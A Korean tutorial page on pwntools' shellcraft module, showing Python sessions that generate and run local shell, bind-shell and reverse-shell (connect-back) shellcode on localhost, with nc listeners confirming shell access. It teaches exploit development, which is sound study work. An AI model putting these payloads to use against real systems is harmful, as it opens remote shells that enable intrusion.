<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

Excuse the ads! We need some help to keep our site up.

<div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'ko', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, multilanguagePage: true, gaTrack: true, gaId: 'UA-92563911-1'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

List

Pwntools - shellcraft

Architectureoperating system
AArch64, AMD64, ARM, intel80386, MIPS, Thumblinux, freebsd
  • 설명을 시작하기 전에 필자가 생각하기에는 shellcraft 모듈에서 제공하는 shellcode는 최적화, 효율적이지 못한 부분이 있다고 생각됩니다.
  • 그렇기 때문에 Shellcraft를 사용할 때 주의가 필요합니다.

Local Shellcode

Synopsis

shellcraft.i386.linux.sh()

Example

>>> shellcode = shellcraft.i386.linux.sh()
>>> p = run_assembly(shellcode)
[*] '/tmp/pwn-asm-g_qJNW/step3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000000)
    RWX:      Has RWX segments
[x] Starting local process '/tmp/pwn-asm-g_qJNW/step3'
[+] Starting local process '/tmp/pwn-asm-g_qJNW/step3': pid 42665
>>> p.interactive()
[*] Switching to interactive mode
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
exit
[*] Got EOF while reading in interactive

Bind Shellcode

Synopsis

shellcraft.amd64.linux.bindsh(port, network)

Example

lazenca0x0@ubuntu:~$ python 
Python 2.7.12 (default, Dec  4 2017, 14:50:18) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> shellcode = shellcraft.amd64.linux.bindsh(2345, 'ipv4')
>>> p = run_assembly(shellcode,arch='amd64')
>>> p.wait_for_close()

lazenca0x0@ubuntu:~/Exploit/shellcode$ nc localhost 2345
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

reverse shell

Synopsis

shellcraft.i386.linux.connect(host, port, network)
shellcraft.i386.linux.findpeersh(port)

Example

lazenca0x0@ubuntu:~$ python
Python 2.7.12 (default, Dec  4 2017, 14:50:18) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> assembly  = shellcraft.i386.linux.connect('localhost', 2345, 'ipv4')
>>> assembly += shellcraft.i386.linux.findpeersh(2345)
lazenca0x0@ubuntu:~$ nc -lvp 2345
Listening on [0.0.0.0] (family 0, port 2345)
>>> p = run_assembly(assembly)
[*] '/tmp/pwn-asm-Nbw1KJ/step3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000000)
    RWX:      Has RWX segments
[x] Starting local process '/tmp/pwn-asm-Nbw1KJ/step3'
[+] Starting local process '/tmp/pwn-asm-Nbw1KJ/step3': pid 4144
>>> 
lazenca0x0@ubuntu:~$ nc -lvp 2345
Listening on [0.0.0.0] (family 0, port 2345)
Connection from [127.0.0.1] port 2345 [tcp/*] accepted (family 2, sport 48708)
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

Related site

Comments

<div class="fb-comments" data-href="https://www.lazenca.net/pages/viewpage.action?pageId=14712942" data-width="*" data-numposts="5"></div>
<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>